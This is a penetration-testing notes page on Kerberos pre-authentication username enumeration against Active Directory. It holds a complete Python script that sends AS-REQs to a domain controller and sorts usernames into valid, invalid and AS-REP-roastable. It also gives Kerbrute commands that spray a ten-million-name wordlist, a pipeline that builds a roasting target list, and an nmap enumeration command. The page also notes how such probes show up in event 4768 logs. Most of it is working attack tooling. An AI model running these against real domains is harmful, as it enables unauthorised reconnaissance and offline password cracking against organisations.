Kerberos Pre-Auth Username Enumeration
How it Works
We send an AS-REQ (a request for a TGT) to the Kerberos Key Distribution Center (KDC) with no pre-authentication data, naming the username we want to test as the client principal. If the username exists and the account requires pre-authentication, the KDC answers with a KRB-ERROR of KDC_ERR_PREAUTH_REQUIRED (error code 25), asking us to come back with an encrypted timestamp. If the username exists and pre-authentication is not required, the KDC returns an AS-REP containing a TGT, and the encrypted part of that reply can be taken away and cracked offline (AS-REP roasting). If the username does not exist, the KDC responds with KDC_ERR_C_PRINCIPAL_UNKNOWN (error code 6). A disabled or locked account comes back as KDC_ERR_CLIENT_REVOKED (error code 18), which still confirms the name exists. Because no password is ever presented, the probes do not count as failed logons against the lockout policy. They are not silent, though: on a Windows domain controller with Kerberos Authentication Service auditing enabled, each probe is logged as event 4768 (a Kerberos TGT was requested), with result code 0x6 for unknown users, so a large spray is easy to spot.
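The exchange above, as an added example that is not the page's own code and not Kerbrute's: a dependency-free Python script that hand-builds an AS-REQ with no pre-authentication data, sends it to TCP/88 and classifies the KDC's answer by message type and KRB-ERROR code. The message tags and error codes are from RFC 4120; the DER helpers, the kdc-options and etype choices, the uppercasing of the realm, the file name krb_userenum.py and the fake_kdc_error() helper (a constructed KRB-ERROR for checking the classifier offline, not a capture) are assumptions of this example.

```python
import os
import socket
import sys

# KRB-ERROR codes (RFC 4120 section 7.5.9) that matter for enumeration
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # no such principal: the username does not exist
KDC_ERR_CLIENT_REVOKED = 18       # principal exists but the account is disabled or locked
KDC_ERR_PREAUTH_REQUIRED = 25     # principal exists and the KDC wants pre-auth first

# Just enough DER to build a KDC-REQ: fields are context tags [n], messages [APPLICATION n].
def der_len(n):  # short form below 128, long form above
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def der(tag, content):
    return bytes([tag]) + der_len(len(content)) + content

def der_int(v):  # non-negative INTEGER, minimal length, sign bit kept clear
    return der(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))

def ctx(n, content):  # [n]
    return der(0xA0 | n, content)

def app(n, content):  # [APPLICATION n]: 10 = AS-REQ, 11 = AS-REP, 30 = KRB-ERROR
    return der(0x60 | n, content)

def gstr(s):  # KerberosString and Realm are GeneralString
    return der(0x1B, s.encode("utf-8"))

def principal(name_type, *parts):  # PrincipalName: name-type [0], name-string [1]
    return der(0x30, ctx(0, der_int(name_type))
               + ctx(1, der(0x30, b"".join(gstr(p) for p in parts))))

def build_as_req(username, realm, nonce=None):
    """AS-REQ for krbtgt/REALM with the padata field left out: no pre-authentication."""
    if nonce is None:
        nonce = int.from_bytes(os.urandom(4), "big") & 0x7FFFFFFF
    realm = realm.upper()
    body = der(0x30,
               ctx(0, der(0x03, b"\x00\x40\x80\x00\x00"))   # kdc-options: forwardable, renewable
               + ctx(1, principal(1, username))              # cname, NT-PRINCIPAL
               + ctx(2, gstr(realm))
               + ctx(3, principal(2, "krbtgt", realm))       # sname, NT-SRV-INST
               + ctx(5, der(0x18, b"20370913024805Z"))       # till
               + ctx(7, der_int(nonce))
               + ctx(8, der(0x30, der_int(18) + der_int(17) + der_int(23))))  # aes256, aes128, rc4
    return app(10, der(0x30, ctx(1, der_int(5)) + ctx(2, der_int(10)) + ctx(4, body)))

def der_read(buf, pos=0):
    """Return (tag, content, position after this TLV)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        nbytes = first & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length

def der_children(content):
    pos = 0
    while pos < len(content):
        tag, inner, pos = der_read(content, pos)
        yield tag, inner

def krb_error_code(krb_error):
    """error-code [6] of a KRB-ERROR ([APPLICATION 30] SEQUENCE { ... })."""
    _, fields, _ = der_read(der_read(krb_error)[1])
    for tag, inner in der_children(fields):
        if tag == 0xA6:
            return int.from_bytes(der_read(inner)[1], "big", signed=True)
    raise ValueError("KRB-ERROR without error-code")

def classify(reply):
    """What the KDC's reply says about the username in our AS-REQ."""
    tag = der_read(reply)[0]
    if tag == 0x6B:   # AS-REP: a TGT came back without pre-auth, so the user is AS-REP-roastable
        return "valid-no-preauth"
    if tag != 0x7E:
        return "unexpected"
    code = krb_error_code(reply)
    return {KDC_ERR_C_PRINCIPAL_UNKNOWN: "invalid", KDC_ERR_PREAUTH_REQUIRED: "valid",
            KDC_ERR_CLIENT_REVOKED: "valid-disabled"}.get(code, "krb-error-%d" % code)

def probe(kdc, realm, username, timeout=5.0):
    """One AS-REQ over TCP/88 (4-byte big-endian length prefix, RFC 4120 section 7.2.2)."""
    req = build_as_req(username, realm)
    with socket.create_connection((kdc, 88), timeout=timeout) as s:
        s.sendall(len(req).to_bytes(4, "big") + req)
        f = s.makefile("rb")
        n = int.from_bytes(f.read(4), "big") & 0x7FFFFFFF   # high bit of the length is reserved
        return classify(f.read(n))

def fake_kdc_error(code):
    """Constructed KRB-ERROR (not a capture) so classify() can be exercised offline."""
    fields = (ctx(0, der_int(5)) + ctx(1, der_int(30)) + ctx(4, der(0x18, b"20240101000000Z"))
              + ctx(5, der_int(0)) + ctx(6, der_int(code)) + ctx(9, gstr("DOMAIN.TLD"))
              + ctx(10, principal(2, "krbtgt", "DOMAIN.TLD")))
    return app(30, der(0x30, fields))

if __name__ == "__main__":  # usage: python3 krb_userenum.py <dc-ip> <domain.tld> <userlist>
    kdc, realm, userfile = sys.argv[1:4]
    for user in filter(None, (line.strip() for line in open(userfile))):
        print("%-32s %s" % (user, probe(kdc, realm, user)))
```

Run as python3 krb_userenum.py dc-ip-here domain.tld kerberos_users.txt. A result of valid-disabled is still a confirmed username: the KDC checks that the principal exists before it checks the account state. Anything that is neither AS-REP nor KRB-ERROR, or a KRB-ERROR with an unfamiliar code, is printed rather than guessed at, since a code such as KDC_ERR_ETYPE_NOSUPP says nothing about whether the user exists.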
Enumeration
Kerbrute
https://github.com/ropnop/kerbrute
Deduplicate and Save a List of Usernames to Spray at the KDC
cat /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt | tr '[:upper:]' '[:lower:]' | sort -u > kerberos_users.txt
Use Kerbrute to Enumerate Valid Usernames
kerbrute userenum -d domain.tld --dc dc-ip-here -t 100 -o kerbrute.log ./kerberos_users.txt
Build a User List for AS-REP Roasting
cat kerbrute.log
grep 'VALID USERNAME' kerbrute.log | awk '{print $NF}' | cut -d '@' -f 1 > as_rep_test.txt
cat as_rep_test.txt
This writes every username Kerbrute confirmed to as_rep_test.txt, one per line, for use with Impacket's GetNPUsers.py. Matching on VALID USERNAME rather than on '@' keeps the $krb5asrep$ hash lines that Kerbrute prints for accounts without pre-authentication out of the list (those accounts are already roastable; the hash is in kerbrute.log).
https://notes.benheater.com/books/active-directory/page/as-rep-roasting-internalexternal
Nmap
Nmap's krb5-enum-users script sends the same pre-auth-free AS-REQs, but it is not multi-threaded and handles large word lists poorly, so keep it for short lists.
domain_controller=dc1.domain.tld
domain='domain.tld'
username_list='/usr/share/seclists/Usernames/top-usernames-shortlist.txt'
nmap -Pn -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=$domain,userdb=$username_list $domain_controller